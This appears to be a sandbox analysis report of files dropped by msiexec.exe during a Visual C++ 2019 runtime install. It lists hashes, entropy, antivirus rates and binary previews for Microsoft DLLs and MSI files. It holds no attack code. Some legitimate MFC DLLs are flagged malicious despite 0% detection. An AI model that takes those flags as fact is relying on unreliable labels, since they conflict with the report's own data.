Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................ORA.....=....................................Q.........Rich...........PE..L...GW.^.........."!........<...............@............................................@A.........................2..@....Q.......`...............f...A...p..P....\..8............................\..@............P...............................text....(......................... ..`.data... ....@......................@....idata..`....P.......6..............@..@.rsrc........`.......D..............@..@.reloc..P....p.......H..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26400
Entropy (8bit):	6.826117601279947
Encrypted:	false
SSDEEP:	384:hlFGXZfbOwqjmeIFWiWEWu9Pc+pBj0HRN7TsHEcyHRN7rwr2l4UP:UD/OtuWLUG
MD5:	4905D449E1C36735AF33A8CF4F08895D
SHA1:	D34E3F579507F23C6B3378DA44E666B85FFF6E3B
SHA-256:	54CF497485E1247F04EF705157CAD26F2FE9D0C353D5970A6FF8E5848504C4DE
SHA-512:	6FF95EB8B191D970E145C6A6DE98370A0B464BE215A5A2DC14E98BEF03DBB886444CEEA0906DFFEFE07960CC870AF377D64AC4EAF6D9FE7E7F5E0D4A92080559
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........qT............mO......................................................................Rich............PE..L...GW.^.........."!................@........0...............................p......u.....@A.........................!../...l@..P....P..0............&.. A...`..D...D...8...............................@............@..h............................text............................... ..`.data........0......................@....idata..t....@......................@..@.rsrc...0....P......................@..@.reloc..D....`.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	274208
Entropy (8bit):	6.608613260235627
Encrypted:	false
SSDEEP:	3072:JLZNCBQSuHX5pXCcDWUE1GM6FXNQBkNo9uYKTsWycLfaMHjb3yiH:WuTDJZXiBEkuYKTVfa6
MD5:	74E8CB0C4E08C63E386F373D1D2C394D
SHA1:	4134B4A2E5BA4C72A0F8D1472D90E94D7EACBD0F
SHA-256:	75E6504A83B23A9B3D58885BFB3ED8A5C06FAB4C25139AAB83C2EC0522D2C095
SHA-512:	84BAB1D2977089AB3BAC41710FAB40AC39D2FE3B0F9FD7AA6D1E2CEDFDE004595F74A8320E21A4D313EECB407B99BAD39429C8AFA65F16698FE485C4C474CBD1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B....`@..`@..`@......`@...A..`@...E..`@...D..`@...C..`@.....`@..`A.u`@...I..`@...@..`@......`@...B..`@.Rich.`@.........................PE..L....V.^.........."!......................... ............................... ............@A........................0....=.............................. A.......W..lJ..8............................J..@............................................text...K........................... ..`.data... p... ...n..................@....idata..............................@..@.rsrc...............................@..@.reloc...W.......X..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vcruntime140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83232
Entropy (8bit):	6.884071103046351
Encrypted:	false
SSDEEP:	1536:DbLqOxUSsdRwFUzVCNkU1jXCizVaYecbv4MUqQmFk:DaOxfsd6FUp3uhecbv4MU
MD5:	4C360F78DE1F5BAAA5F110E65FAC94B4
SHA1:	20A2E66FD577293B33BA1C9D01EF04582DEAF3A5
SHA-256:	AD1B0992B890BFE88EF52D0A830873ACC0AECC9BD6E4FC22397DBCCF4D2B4E37
SHA-512:	C6BBA093D2E83B178A783D1DDFD1530C3ADCB623D299D56DB1B94ED34C0447E88930200BF45E5FB961F8FD7AD691310B586A7D754D7A6D7D27D58B74986A4DB8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T...............Q........q.........8...................................................Rich............................PE..L...;W.^.........."!.........................................................@......g.....@A......................................... .................. A...0..8....#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\452cad.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}, Create Time/Date: Wed Jan 8 09:28:18 2020, Last Saved Time/Date: Wed Jan 8 09:28:18 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	192512
Entropy (8bit):	6.237627585353464
Encrypted:	false
SSDEEP:	3072:VGviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdNt:8vipBaTDo1j//SZhN
MD5:	6AA3A12A374E36C6A7BD75B7627A5A7C
SHA1:	56DD5F67FE9FB9C9B70470F535FC2DD6C2DECF38
SHA-256:	AA5B428789D83FBCD60442EE253B364C5FC833C698C1DC1EB73F5559A63FB976
SHA-512:	B3A4497E3629A4ED8DB8C7D83C5D8CF2270D7DCE320CA4D5009EDB0F6CBC3F3759A2F753ED0C673EFAF521AA175E2E6D53FC609F351B8A0AA00D74BC4F179720
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\452cb1.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}, Create Time/Date: Wed Jan 8 09:28:18 2020, Last Saved Time/Date: Wed Jan 8 09:28:18 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	192512
Entropy (8bit):	6.237627585353464
Encrypted:	false
SSDEEP:	3072:VGviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdNt:8vipBaTDo1j//SZhN
MD5:	6AA3A12A374E36C6A7BD75B7627A5A7C
SHA1:	56DD5F67FE9FB9C9B70470F535FC2DD6C2DECF38
SHA-256:	AA5B428789D83FBCD60442EE253B364C5FC833C698C1DC1EB73F5559A63FB976
SHA-512:	B3A4497E3629A4ED8DB8C7D83C5D8CF2270D7DCE320CA4D5009EDB0F6CBC3F3759A2F753ED0C673EFAF521AA175E2E6D53FC609F351B8A0AA00D74BC4F179720
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\452cb2.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}, Create Time/Date: Wed Jan 8 09:31:14 2020, Last Saved Time/Date: Wed Jan 8 09:31:14 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	184320
Entropy (8bit):	6.3376915344280516
Encrypted:	false
SSDEEP:	3072:JviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdN:JvipBaTDo1j//SZhN
MD5:	4B97853A7D10743D67665CCDD67E8566
SHA1:	AF5F7059C9A05A388B4773917E17A078FA58F5E9
SHA-256:	63802C8D96CF21A8EADB1EC5B0B52A9A040581AB2797FE5132E1B3A469108713
SHA-512:	ED88564A372FBA36FB7F2D98476C82D1D66B17B25AB9B6C34489D33BB7F1D64ABBD2E746E75470E05DECA09252D9B855AB0F37F6F82210AF3F006C9A683C7370
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\452cb9.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2019 X86 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508., Template: Intel;1033, Revision Number: {AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}, Create Time/Date: Wed Jan 8 09:31:14 2020, Last Saved Time/Date: Wed Jan 8 09:31:14 2020, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
Category:	dropped
Size (bytes):	184320
Entropy (8bit):	6.3376915344280516
Encrypted:	false
SSDEEP:	3072:JviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdN:JvipBaTDo1j//SZhN
MD5:	4B97853A7D10743D67665CCDD67E8566
SHA1:	AF5F7059C9A05A388B4773917E17A078FA58F5E9
SHA-256:	63802C8D96CF21A8EADB1EC5B0B52A9A040581AB2797FE5132E1B3A469108713
SHA-512:	ED88564A372FBA36FB7F2D98476C82D1D66B17B25AB9B6C34489D33BB7F1D64ABBD2E746E75470E05DECA09252D9B855AB0F37F6F82210AF3F006C9A683C7370
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2F1E.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	7552
Entropy (8bit):	5.6333084703587035
Encrypted:	false
SSDEEP:	96:4DDpeDVDpE8rorjkFEdogLNy5J5J5J5J5J5J5J5J5AO5KvbSYYHxRRI8tlDpN8kl:4sWzLrDSHXh0eG6nGYWOf
MD5:	4EE6F6EEC5E6F9A232304A4588415A00
SHA1:	C20D1096E5C4E8E5F5A7D8FF9E800F89AD43E20E
SHA-256:	E0B1660F82B7AABD02D19DCE3590F9E918029181C757FB6FEDDA48BD650D2856
SHA-512:	B424FCE61D04BBC22FE3C877022C62AE174019CDF5CA4EAC58A1D77AE37DC35D15CE317D621CC60567FDCE55716687F58669B6D576A3A472EBDDBD628E9C075C
Malicious:	false
Preview:	...@IXOS.@.....@Bu"Z.@.....@.....@.....@.....@.....@......&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2};.Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508..vc_runtimeMinimum_x86.msi.@.....@\o...@.....@........&.{DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E3819B64-3C56-3DD7-921D-00B011AD31DE}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X86\Version.@.......@.....@.....@......&.{42F41217-AF8B-33D4-9CB3-FF5F696BECBB}...@.......@.....@.....@......&.{E8E39D3B-4F35-36D8-B892-4B28336FE041}$.C:\Windows\SysWOW64\vcruntime140.dll.@.......@.....@.....@......&.{A2AA960C-FD3C-3A6D-BD6F-14933011AFB3} .C:\Windows\SysWOW64\msvcp140.dll.@.......@.....@.....@......&.{A2E7203F-60C2-3D7E-8A46-DB3D

C:\Windows\Installer\MSI3430.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	9668
Entropy (8bit):	5.640212338451448
Encrypted:	false
SSDEEP:	192:4ivmH5xSSSLuyAV2YO8WeCUoBaOepp33LsLNWsrJ5:4ivmH5xSSguyA0YOn10pnQZWsrJ5
MD5:	D223460AF7D0700B556064C17EBCF932
SHA1:	6876556C8235CB040B58D40E6D7CEA63081639ED
SHA-256:	A39690847E6575C49D44FD668FF3E14DD191F0209DBDA764410E7DC188AF0B5E
SHA-512:	C29844870A535526F125933D7B8E43CA8C36847CBC289402C3C89FE2862A1378181E30E8CFF2F1224B59BBDAEC0D7343565B1BFABFC4012A5E8F0F1A34CE4DDE
Malicious:	false
Preview:	...@IXOS.@.....@Bu"Z.@.....@.....@.....@.....@.....@......&.{0FA68574-690B-4B00-89AA-B28946231449}>.Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508..vc_runtimeAdditional_x86.msi.@.....@\o...@.....@........&.{AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E3819B64-3C56-3DD7-921D-00B011AD31DE}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X86\Version.@.......@.....@.....@......&.{4FD4AB8C-C57F-3782-9230-9CCA22153AD3}..C:\Windows\SysWOW64\mfc140.dll.@.......@.....@.....@......&.{46A1EA6B-3D81-3399-8991-127F7F7AE76A}..C:\Windows\SysWOW64\mfc140u.dll.@.......@.....@.....@......&.{C94DDE19-CC70-3B9A-A6AF-5CA7340B9B9A}..C:\Windows\SysWOW64\mfcm140.dll.@.......@.....@.....@....

C:\Windows\Installer\SourceHash{0FA68574-690B-4B00-89AA-B28946231449}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.208152023467291
Encrypted:	false
SSDEEP:	12:JSbX72Fj8XAlfLIlHuRpWBhG7777777777777777777777777ZDHFw7zpHQEQBpe:J4UIwUieFHQjcF
MD5:	4F2CE5135533E5FF6D30F42905032E21
SHA1:	E2CCB50DC47EFF5E8490EC9AF5331E9E0369A320
SHA-256:	24BD4FABFDC17A615B45F949D0569FB3291F37F39F7831C50FB27930B65BD390
SHA-512:	15B6B7CFA72EFB367C10382FA819EB8C6F2D25FE329928994AA8F585BF98C730A8B5E5FBBC43B71FEA06C57DCAF6A4C7C2C5ECC47618A5C9F93EAD2AF2075297
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.2063722672677177
Encrypted:	false
SSDEEP:	12:JSbX72FjGXAlfLIlHuRpZhG7777777777777777777777777ZDHFPZx2hs9X4KQr:J2UIwExP2hs9fcF
MD5:	AF6E4292AF4A4E8541C2A62216237286
SHA1:	98B7058DE08855D36E7621AEFE995FE6E375C2A3
SHA-256:	D59CDE22A961356DBA505EA1E0EAE4723BF2AF0278CF68A5A8FE47735BFF3DF3
SHA-512:	CFE2CA291B065817121732FA3A8F09B9D338010A6C8F47E21F5C3F066ABD86483A2995C425ACB949173498233CD114295770BDEE108B8A13682B3C330165BC81
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5248121879651357
Encrypted:	false
SSDEEP:	48:b8PhVuRc06WXi/FT5ydj6RLBL7qSmRSVESIVoZQc:ChV1RFTkjaLBL7qVR3JoZQc
MD5:	890E6C22F703596D12971357E9F26495
SHA1:	50A3E3BB24438B644A6BDA5E1D66A859C2093651
SHA-256:	D6D265B1A3579356580B8F5DC7C8844BEFD4E2B82EDE64A2E05BF4D2E42A34B5
SHA-512:	C6EEA42FE14C6F3FD9B5FBD76269C298FD8F25CCFDED1DC57BA26990585A67E0FEE43D65FD3F8D01440281F37FE7FE5A6C57C8B0D91B623B2F9917554336C85F
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362979488354632
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauc:zTtbmkExhMJCIpEl
MD5:	30E38944962B19785F765F79CD6992F6
SHA1:	5FB7BD0B65F7BA75DC8D7F8B92907DA53915C70E
SHA-256:	457C91AD04F29C669AB18A08EC774F194F0C768B34D46C042E9652298B7183FE
SHA-512:	4129839B224548F0FDC9D890BE41547352C86CC5FB7390383071B1224BC8827DCC1EBA0B5B34036CACC0AC3AADB200DFEFB917FF8DC34BEE92CA8D68929F6623
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\mfc140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4782880
Entropy (8bit):	7.048362842065633
Encrypted:	false
SSDEEP:	98304:rcQO/zACc35FeIj0v8Tu8expRWrBu2gubZkFLOAkGkzdnEVomFHKnP7z:jqie9v8CVp4Bu2gubZkFLOyomFHKnP
MD5:	4B9941864214A7BB96D3704420C2D28C
SHA1:	05ACF3D57A349DCF29BC68A7A6F0DEC6D971B940
SHA-256:	1F9CCCA43EEF25CA44C69648124265944493FC220BCDECDB79AA28C33468B59B
SHA-512:	5CB4FFE656AB0C9973A02A7055689F8B945BCFB312B6B324432A717B2C95FF89B35BF70AE553F5176921A7DFF0E8F8F357288496EDC149CB377675130C7AD38B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........%.suv.suv.suv7.v.suv7.v.suv7.v.suv...v.suv..tw.suv..qw.suv..vw.suv..pw.suv7.v.suv.stv.wuv..\|w.ruv..uw.suv...v.suv..ww.suvRich.suv........................PE..L....V.^.........."!.........b......._*......................................0I.....r.I...@A.........................-....../......./...............H. A....E.x...l@..8...........................@4..@............./.....`.-......................text.............................. ..`.data...............................@....idata...T..../..V...6/.............@..@.didat......../......./.............@....rsrc........./......./.............@..@.reloc..x.....E......(E.............@..B................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140chs.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47592
Entropy (8bit):	6.147771533863041
Encrypted:	false
SSDEEP:	384:DA5dBlsNKvsXZWxdWvYbMktLiBr8uuPgldyevyBb7DVLN1Xzc+pBj0HRN7TPocyF:GdzvsXcb9tLkr8yTby97DVLBWUHui
MD5:	5EB37CFB087F972E0E9BF8CD9F216D0A
SHA1:	3FD426C91E122990E7746C415AEB3C9E6A459073
SHA-256:	9DBE835C0812D759A4461429D4FDE097BB9EC67A97F347F70C9796800DE92BA6
SHA-512:	865670D5EECF2EAB3BD17348FDCD31EC785F55F345E6048F83B346C16594535F59D68E6EE8F11453C2BD65D89440B50A54903D55E21F6DCB6C7DE79CDC2C06C2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L...\|V.^.........."!.........v............................................................@.......................................... ..8s...........x...A..............8............................................................................text...............................@..@.rsrc...8s... ...t..................@..@....\|V.^........Y...8...8.......\|V.^........T...........RSDS..M.X=NK.....dH.....d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHS.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140cht.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47392
Entropy (8bit):	6.180362861252495
Encrypted:	false
SSDEEP:	768:uDhffucVI4Sd7kYw4JUM3i/EhWrKpWin2vSd:YucVI4Sd4YJUM3XhWuoNKd
MD5:	40F626F56782D1C6AE773B202082CB92
SHA1:	65388EDEF5C7DC53A0040AD73D144D52FD02B7F8
SHA-256:	8056DF5651B576CFFAD288A322939049CF62C8A564CB53EEE187E2DCBDBD9BEF
SHA-512:	7F99BFB9C11E377BF5B1F526FA6015BF99E28683EEC5C52FB453F60F4C49561FE81B21A61A4783673C46A8F6D62E048609720674746057291A9F025F565822CD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!.........v......................................................R.....@.......................................... ..`s...........x.. A..............8............................................................................text...............................@..@.rsrc...`s... ...t..................@..@.....V.^........Y...8...8........V.^........T...........RSDS..9....N..'q........d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140CHT.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140deu.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	76272
Entropy (8bit):	4.788610818407564
Encrypted:	false
SSDEEP:	1536:SVPidQr0UZqnn0BDvmPS6VFaGCWKZ+e0petNSaBhp0vcsjsr8gWb8C1dCuf9xtP9:SVidQr0UZqnnSvmPS6VFaGCWKZX0Whpq
MD5:	20A38BD043C56FE2882F88944A3E6E6C
SHA1:	5E154DFD410A7F8F99D11C999DD68CD0C76842F9
SHA-256:	CD305576B63458ADF41BDB70FB6EBAED8A032294851336786A5A7169F4F57B05
SHA-512:	8C706656BA722EA7A9F313F5C1DEF41FA70D7E13D59BC5A3D8F85FE5CEDC2F014DDB76E16D15C231DD08FA6D639C8C457841FF0CCECC6B0FBAC379A460EC5C66
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!................................................................0[....@.......................................... ..X................A..............8............................................................................text...............................@..@.rsrc...X.... ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS2j.5,..J.#..#......d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140DEU.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140enu.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66336
Entropy (8bit):	4.921664492323363
Encrypted:	false
SSDEEP:	768:9VmijcBEhCgy6cAu1HLPLNqyf/nWHBNhdBU2fd5GWPoRh:9Vdzfy6cAuhPLNXf/nWHNfd/PoRh
MD5:	183B42F7ECEDB4AE4BE8E06C2981EDEF
SHA1:	906365FECC6B420C63BDB05574C79571ED4C6654
SHA-256:	5C4B666503DCABF9763610EC5AB3B19D4555A5F349DE7067D6D0F7A3E8146126
SHA-512:	B4C57C1270D2E219210AEA3145148D8DC68A95ED31A0CC026413179A73961E7215DDE9F355B20859BD19B3BDDA943B48F79F94B6F7CC7BB8F4B087CD6E7F73E4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!......................................................................@.......................................... ................. A..............8............................................................................text...............................@..@.rsrc....... ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS.W-.R.8@..(=.hYo....d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1..X....rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140esn.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75040
Entropy (8bit):	4.751545699698718
Encrypted:	false
SSDEEP:	768:5K0KnBU6gW6qg/iKuCOCF3OKWRElMRZ/IvpIfWUz1v3nl:Vwq6gW6B/iKuFm3OKWxRZ/InW1f
MD5:	D50AB1B9666BD7C9E7C134ADE3C42D1C
SHA1:	CDC5C1987689F1A0E34075CD18C692EA88C17E3A
SHA-256:	8AD53B060AA193BE6517C8C63D1855B39B6523696C617C0764822DB131E78F22
SHA-512:	489D6E0346168381066F0D372E1AD3CBC66FFD3B1F07DC80B76441DCD231563803EF940A96F93270F2BCC82A35F4793EE4B6AD6F4A15A4DAB25ACA343CB693BE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!......................................................................@.......................................... .................. A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS+..Ti.F.........d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ESN.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140fra.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	76272
Entropy (8bit):	4.7728351522639585
Encrypted:	false
SSDEEP:	768:W26iNYajZELOtYFmNRYxAaTafCp5eQYZmZUjyyyyyyyyyyyyyyyUGQFUbWTVNerP:WNuqLOt6A2SCHu0joPwsM
MD5:	D58A56D308276A6323EDF45A704C443B
SHA1:	445244F7D875A04B8612E04CA1CACDC7D5275B0F
SHA-256:	22FB670A0C08110F12D9268BBC5F015E5344CD0EA61CF414F2BE4A05B3396478
SHA-512:	AB26805F0FF25ABB934B12F668E0FB5B462D27450673653251BB2B55656DDC4BCBBFA4C12445FAB46AB110E4C28B5F0A156A27D9DAB6CCC1F67748237FDFF8C0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
